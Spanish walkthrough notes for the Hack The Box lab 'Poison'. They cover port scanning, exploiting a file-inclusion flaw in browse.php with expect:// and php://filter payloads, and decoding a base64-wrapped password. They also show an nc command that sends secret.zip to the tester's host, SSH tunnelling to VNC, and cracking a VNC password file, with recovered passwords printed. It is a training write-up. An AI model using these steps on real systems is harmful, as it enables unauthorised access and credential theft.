echo "10.129.1.254 poison.htb" | sudo tee -a /etc/hosts

nmap -sC -sV -O -oA initial 10.129.1.254

nmap -sC -sV -p- -oA full 10.129.1.254

# udp scan
nmap -sU -p- -oA udp 10.129.1.254

rustscan --accessible -a poison.htb -r 1-65535 -- -sT -sV -sC -Pn

Pasted image 20210304201014.png

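Vamos a http://10.129.1.254/browse.php?file=listfiles.php

browse.php recibe el nombre de un archivo en el parámetro `file` y devuelve su contenido. Por lo que se ve en estas notas, el valor no se restringe a una lista de archivos permitidos; esa es la corrección que hace falta en el lado del servidor.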

Pasted image 20210304204136.png

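Vamos a http://10.129.1.254/browse.php?file=pwdbackup.txt

pwdbackup.txt es un respaldo de contraseña servido por el propio sitio web. El script de más abajo decodifica base64 sobre secret.txt, que presumiblemente es una copia de este contenido: está codificado, no cifrado, así que equivale a guardar la contraseña en claro.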

Pasted image 20210304205440.png

expect://id

Pasted image 20210304205457.png

php://filter/convert.base64-encode/resource=[file-name]

Pasted image 20210304205510.png

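#!/bin/bash
# Decode a value that was base64-encoded several times in a row.
#
# Input:  secret.txt in the current directory, holding the encoded text.
# Output: the decoded value on stdout.
# Exit:   0 on success, 1 if the file cannot be read or a round does not
#         decode as base64.

# $(<file) reads the file without spawning cat.
secret=$(<secret.txt) || {
  echo "cannot read secret.txt" >&2
  exit 1
}

# 13 rounds is the count used for this particular file; each round strips
# one layer of encoding.
for i in {1..13}; do
  # Stop at the first round that fails instead of feeding garbage into the
  # next one and printing a meaningless result.
  secret=$(base64 --decode <<<"$secret") || {
    echo "round $i: input is not valid base64" >&2
    exit 1
  }
done

# printf instead of echo so a value starting with '-' is printed literally.
printf '%s\n' "$secret"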

Charix!2#4%6&8(0

Pasted image 20210304205549.png

ssh charix@poison.htb

Pasted image 20210304205610.png

nc -lvnp 443

nc 10.10.14.135 443 < secret.zip

Vamos a http://10.129.1.254/browse.php?file=/var/log/http-access.log

ps -auxww | grep vnc

Pasted image 20210304205630.png

netstat -an | grep LIST

Pasted image 20210304205647.png

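ssh -L 5000:127.0.0.1:5901 charix@10.129.1.254

Este túnel expone en el puerto local 5000 el servicio que escucha en 127.0.0.1:5901 de la máquina remota (presumiblemente el VNC visto en el `ps` anterior).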

Pasted image 20210304205704.png

netstat -an |grep LIST

Pasted image 20210304205711.png

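https://github.com/jeroennijhof/vncpwd

$ ./vncpwd ../secret
Password: VNCP@$$!

La herramienta recupera la contraseña a partir del archivo sin necesitar ningún otro dato, por lo que un archivo de contraseña de VNC debe tratarse como una contraseña en claro.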

Pasted image 20210304205732.png
